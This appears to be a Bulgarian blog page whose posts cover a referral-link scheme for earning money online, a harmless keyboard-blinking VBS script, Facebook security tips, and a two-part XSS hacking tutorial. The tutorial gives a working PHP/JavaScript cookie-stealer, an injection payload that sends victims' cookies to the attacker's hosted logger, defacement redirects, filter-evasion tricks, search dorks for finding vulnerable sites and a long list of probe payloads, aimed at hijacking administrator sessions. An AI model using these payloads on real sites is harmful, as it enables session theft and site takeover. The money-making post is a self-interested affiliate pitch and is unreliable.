Пари от интернет.Не бъдете предубедени живеем в 21 век


Ето ви лесен начин за пари от интернет сигурно повечето от вас ще си кажат поредната измама и аз бях скептично настроен когато разбрах за този метод  доста четох из интернет и на всичките места имаше доказателства за плащания. По надолу ще ви дам линк и за форум с над 30 страници където разискват този сайт… Първите 9 всички бяха доста скептично настроени от 2 от форума получиха чек за по 150 долара.Та да преминем към същинската част от сайта . След кратка регистрация влизате в профила си сайта наподобява youtube и vbox7 имате клипове на всяко споделяне на клип от там вие получавате по 10 цента  имате право на 5 споделяния които ви отчитат пари другите са това са 50 цента . След това пише REACT а това е оценка на снимка или клип също имате право на до 5 които са платени.Всичките клипове и снимки са забавни като доста от тях не сте виждали по български сайтове и ще ви е интересно. Това прави по 1 $ на ден който ви е в кърпа вързан.Има начин да докарате повече пари  като качвате снимки  и клипове ( изискването е да са авторски или поне без запазени права и да ги няма вече в сайта ако ги има разбира се просто няма да бъдат приети ) . За всеки клип или снимка която събере 25 Реакции ( харесвания споделяния и така нататък ) Вие получавате по 5 $ за снимка и 10 $ за клип . Сега сигурно вече ви звучи още по добре и си мислите със сигурност че това е някаква измама.Ето линк за форум където можете да прочетете доста за този саит : http://www.pari-ot-internet-bg.com/t5359-topic ако решите да го прочетете моля прочетете го цялото защото ако съдите само по първите 7-8-9 страници ще останете разочаровани .
Ето линк за регистрация към сайта : http://www.jokeroo.com/register.php?ref=215538 ако имате някакви въпроси можете да питате в скайп на адрес : pvdpepo1 или във фейсбуук.Плащанията са по стандарт Нет 30 могат да бъдат извършени чрез PayPal или Чек ( Вече работят и с България ) . Сайта е от 2010г. и засега няма оплаквания.Благодаря на всички които са се регистрирали през моя линк за регистрация.И за прочетената статия 

Как да направите клавиатурата ви да мига като коледна елха

Този скрипт ще направи така че num lock , scroll lock и Caps Lock ще започнат да мигат изглежда много хубаво.И можете да го спрете лесно.
И така първо отворете Notepad и копирайте следния код:
--------------------------------------------------------
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
--------------------------------------------------------
Запишете файла с разширение Нещо.VBS пуснете файла и се забавлявайте.Няма никаква опасност  когато решите да го прекратите отворете Task Manager и затворете процес с името WSCRIPT.

Как да защитите профила си в Facebook


Сигурно често разбирате ,че facebook на ваш приятел/ка е бил хакнат .Повечето аз вас си мислят че това няма как да им се случи , но в повечето случаи грешим.В тази статия ще ви дадем някои идеи как нашия профил в социалната мрежа да е малко по-защитен.
1.Най-важното е да не предоставяте никаква информация която може да бъде използвана срещу вас . Като дата на раждане .Емайл и други.Най-често използвания метод  за хакване на вашия профил е Социално Инженерство ,а именно с лична информация използвана във вашия емайл адрес.В повечето случаи този метод се използва от хора които ви познават доста добре.
2.Добре е да използвате таен въпрос и отговор във вашата поща които е различен от вариантите по –долу :
Как си
Как се казва майка ми/баща ми брат ми и така нататък.
Как се казвам , Как ми е ЕГН-то , Какъв ми е любимия цвят . 
Ще се изненадате колко от вас имате такива въпроси , а отговора в повечето случаи е доста лесен и лесно можете сами да се издадете.
3.Както вече може би разбрахте от т.1 и т.2 добре е потенциалните хакери да не знаят вашия емайл адрес ще ги затрудните доста. Можете просто да разгледате опциите с които вашия профил разполага и да скриете вашият емайл адрес, а също така и дата на раждане или да използвате фалшива във вашата поща ,но и това е излишно ако имате  достатъчно сложен таен отговор.
4.Друг често използван метод е когато проверите вашия профил от предварително заразен компютър с  Key Logger . Тогава можете дори и да не разберете ,че други хора имат достъп до вашия профил.
5.Не приемайте файлове по Skype ако не сте на 100% сигурни в тях.Често ваши познати ви пращат файлове без дори да знаят защото компютрите им са вече заразени и вируса се опитва да зарази и вас.
6.Много добра защита която можете да използвате във вашия профил е когато при влизане сайта изпраща на вашия телефон код за достъп значително можете да затрудните хакерите.

Наглася се от тук :

7.Друго което е съществено важно е да използвате криптирана връзка между вас и сървъра на страницата която се нарича SSL . Това променя вашия таг http:// във https://
8.Добре е да добавите и втора поща към вашия профил която не използвате за други цели във случаи ,че първата бъде хакната.
Надяваме се съветите да са ви били от ползва.И никога не забравяйте ,че в повечето случаи най-голямо желание за достъп до нашия профил имат близките ни ,който искат да знаят всяка наша стъпка или просто поредната клюка.

Част 2:Какво е XSS и как се използва

XSS:Методи за напреднали

В.предишната статия разбрахте какво е XSS и как се работи с него ,а в  тази статия ще ви кажа начини как да използвате XSS за да хакнете сайт.Моля използвайте материала само за учебна цел.И предупреждавайте администраторите на страниците ако забележите грешки.Вие подлежите на съдебна отговорност при използване на методите срещу страница.Използвайте Proxy или VPN Server.

Кражба на така наречените бисквитки ( cookie )

Кражбата на така наречените бисквитки е най-доброто нещо което можем да направим с непостоянен XSS.С кражбата на бисквитките ще имаме достъп до сайта както всеки който го е използвал.Най – лесния начин за това е . Първо трябва да направите сайт които да краде и записва тези бисквитки .Лично аз използвам http://www.000webhost.com/ най-добрия сайт за използване на лош код , програми и друго.Затова отиде там и се регистрирайте.След като сте направили вашия сайт отидете в file manager и направете файл с името CookieLog.txt . Оставете го празен. Сега направете друг с името CookieLogger.php в който трябва да сложим кода ,който изпраща откраднатите бисквитки във текст файла. Уверете се че файла е с нужното разширение .php иначе кода няма да работи.И така ето го и кода :

<?php

if(strlen($_SERVER['QUERY_STRING']) > 0) {
$fp=fopen('./CookieLog.txt', 'a');
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';
function URLEncode(str)
{
var SAFECHARS = "0123456789" + // Numeric
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
"abcdefghijklmnopqrstuvwxyz" +
"-_.!~*'()"; // RFC2396 Mark characters
var HEX = "0123456789ABCDEF";

var plaintext = str;
var encoded = "";
for (var i = 0; i < plaintext.length; i++ ) {
var ch = plaintext.charAt(i);
if (ch == " ") {
encoded += "+"; // x-www-urlencoded, rather than %20
} else if (SAFECHARS.indexOf(ch) != -1) {
encoded += ch;
} else {
var charCode = ch.charCodeAt(0);
if (charCode > 255) {
alert( "Unicode Character '"
+ ch
+ "' cannot be encoded using standard URL encoding.\n" +
"(URL encoding only supports 8-bit characters.)\n" +
"A space (+) will be substituted." );
encoded += "+";
} else {
encoded += "%";
encoded += HEX.charAt((charCode >> 4) & 0xF);
encoded += HEX.charAt(charCode & 0xF);
}
}
} // for

return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

< ?php
}
?>



Сега просто трябва да изпратим страницата с този код на жертвата.Има много начини за това проявете въображение.Сега трябва да въведем скрипта който ще запише бисквитката.Там където сте проверили че има XSS грешка в сайта въведете следния код:

<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

Въведете скрипта след страницата където е грешката и я изпратете на жертвата.Това може да отнеме малко повече време ако администратора кликне на получения клип вие сте късметлии и имате достъп до сайта в противен случай трябва да намерите друга грешка във сайта.След като откраднете бисквитката на администратора можете да свалите plugin за Mozzila FireFox с името Cookie Manager с него можете да променяте бисквитките за даден сайт.Може би най-полезния plugin за XSS атака.

Така наречения Deface е когато смените заглавната страница с цел да покажете ,че защитата на сайта е слаба за вас.Можете да използвате следния код в някоя кутия за коментари като пренасочите сайта към предварително изграден от вас deface index.html

Код:

<script>window.location="http://www.example.com/вашата страница/";</script>

XSS: Onmouseover

Onmousover не е от най-използваните грешки за пробиване защитата на сайтове но все пак съдържа XSS.Ще изглежда нещо като:

onmouseover=alert("XSS")

Често се намира но все повече сайтове вече използват Adobe Flash или CSS за да постигнат този ефект.

XSS Filter Техники за преминаване.

Понякога проста XSS заявка няма да премине към сървъра. Причината за това е ,че сайта има направен filter за тези заявки които предполагат неблагоприятен код. Той ще блокира повечето SQLi и XSS заявки.Има много начини да преминем този филтър тук ще обясня няколко.

Hex

С блокирани символи като >, <,и /, е трудно да изпълним XSS код. Но не се притеснявайте винаги има начин.Вие можете да смените вашите символи и да ги превърнете в HEX код. Това би ви помогнало:

> = %3c
< = %3c
/ = %2f

ASCII

Можете да превърнете вашия код в ASCII и така символите които често се използват няма да бъдат разпознати.
Неработещ код:

<script>alert("XSS")</script>


Работещ код:

<script>alert(String.fromCharCode(88,83,83))</script>


За да криптирате части от кода можете да използвате този сайт: http://www.wocares.com/noquote.php Намирам го за полезен.

Промяна размера на буквите и символите

Рядко работи и при по новите версии филтри неработи но нищо не пречи да опитате като промените размера на буквите.

Код:

<ScRiPt>aLeRt("XSS")</ScRiPt>


Също можете да го комбинирате с ASCII код.

Няколко места където можете да намерите XSS грешки винаги е хубаво да търсите нови места.Напишете следните кодове в google.com

Код:

inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx


Дано статията ви е харесала благодаря за прочитането и.

Част 1:Какво е XSS и как се използва

Здравейте и благодаря ,че четете този урок за XSS, написан от мен.XSS

Какво е XSS?

XSS е Cross-Site Scripting. Основен вид атака, който се използва за извършване на HTML и Javascript код в уеб-страница. Тази атака може да стане чрез подаване на заявки в текст кутии, или дори в URL. Резултатите се връщат като прочетен HTML текст , така че той изпълнява скриптове, вместо да ги показва като обикновен текст. С XSS атака, можете да открадне Cookies от уеб-администратор, или дори да използвате социално инженерство, за да се манипулира някой да изтегли вирус, който сте създали. Такива като бот мрежа, или плъх, може би дори Keylogger. XSS може да бъде много опасно, но може да бъде e много лека атака. Повечето от атаките са леки XSS , които могат да бъдат трудно да се използват срещу уебсайт. Има много начини, за да използвате XSS във ваша полза. Ще назовем само няколко примера. Можете да използвате полето сигнал (alert box ), за да рекламирате себе си, или да сигнализирате уеб-администратор, че сте открили пробив в сигурността, включващи XSS. Можете също така да настроите Cookie-Stealer/Logger. Всичко, което можете да направите с HTML, може да се използва срещу сайт с тази атака. Аз ще обясня някои от най-важните термини, свързани с XSS.



Какво е HTML и Javascript?

HTML
HTML е нещо като език за програмиране. Разграниченията между език за програмиране и HTML, не са твърде далеч един от друг. Те са двата езика, които се използват за създаване на атрибути, и събития. HTML е език за маркиране, който се използва най-вече за създаване на уебсайтове. HTML е Hyper-Text Markup. Можете да използвате HTML, за да създавате форми, бутони и други неща, които могат да бъдат използвани в уеб страница. Аз силно се съмнявам, че някога ще попаднете на уебсайт, който не съдържа дори малка част на HTML.

Javascript
Първо да уточним ,че има огромна разлика между JAVA и Javascript. Java е език, който е близък до C + +, той може да се използва в игри и приложения. Javascript е нещо подобно на HTML, но определено се различава по много начини. Javascript не се използва толкова много в уеб страници колкото HTML . Javascript се използва повече в приложения извън уеб страници. Подобно на PDF файлове. Javascript може да бъде невероятно полезен език, заедно с HTML. И двата са доста лесни за научаване, и са много динамични.



XSS: Моята първа атака.
Сега, нека да започнем да научаваме наистина добри неща. В този раздел, аз ще обясня как да използвате XSS във ваша полза. Ние също ще стартираме първата ни атака с XSS.
Сега, нашата първа стъпка, е очевидно, да намерим уязвим сайт. Намирането на сайт уязвим към XSS е много по-лесно от намирането на сайт уязвим към SQLi . Проблемът е, че това може да отнеме време, за да се определи дали сайтът е наистина уязвим. С SQLi, можете просто да добавите малко ". Но в XSS, вие трябва да представите (понякога) няколко заявки, за да тествате сайта си за XSS.

Най-уязвими сайтове ще съдържат ( търсене, Login , или полета за регистрация ) . Почти навсякъде се съдържа текст кутия където могат да се използват XSS атаки. Въпреки това, много хора забравят този факт, и никога не я използват в пълния си потенциал , защото си мислят, че е безполезно . Могат да се възползват от XSS чрез сорс кода.
Както и да е, нашият сайт трябва да има някаква текст, кутия за въвеждане на код. Аз просто ще се използва лентата за търсене.
Така че, нека опитаме въвеждането на най-известната, заявка на всички времена.

<script>alert("XSS")</script>

Този малък скрипт, е HTML. Ще се появи малко прозорче казвайки: "XSS".Можете да редактирате тази част, ако ви харесва. Просто не редактирате всякакви други части на скрипта. Сложи това в лентата за търсене и натиснете Enter. Сега, ако всичко е станало както сме описали по горе и се е появило прозорчето значи сте намери сайт който подлежи на XSS! Ако не се появи прозорчето означава че сайта има филтър който проверява дали зададения код е опасен за сайта. Той проверява за всякакви злоумишлени (опасни) неща. Понякога, тези филтри са много слаби и могат да бъдат преминати много лесно, друг път, те могат да бъдат доста трудни за заобикаляне. Има много начини да се за обиколят XSS филтрите. Първо, ние трябва да открием това, което филтъра блокира. В повечето случаи се блокира сигнала ALERT . Ето един пример за този вид филтър:

<script>alert( > XSS DETECTED < )</script> е блокирано и как можем да преминем през този филтър.

За благодарност има опция която криптира съобщението.Ще използваме тази функция наречена "String.FromCharCode". Името обяснява доста , тя криптира текста в ASCII код



Код:

String.fromCharCode(88,83,83)

Може би звучи малко объркващо , но с малко практика се научава лесно . Ето как ще изглежда нашата атака сега :

<script>alert(String.fromCharCode(88,83,83))</script>



Сега вече натискаме Enter и би трябвало да се появи прозорец “XSS” , ако не се появи можете да опитате с някои от тези кодове :

"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))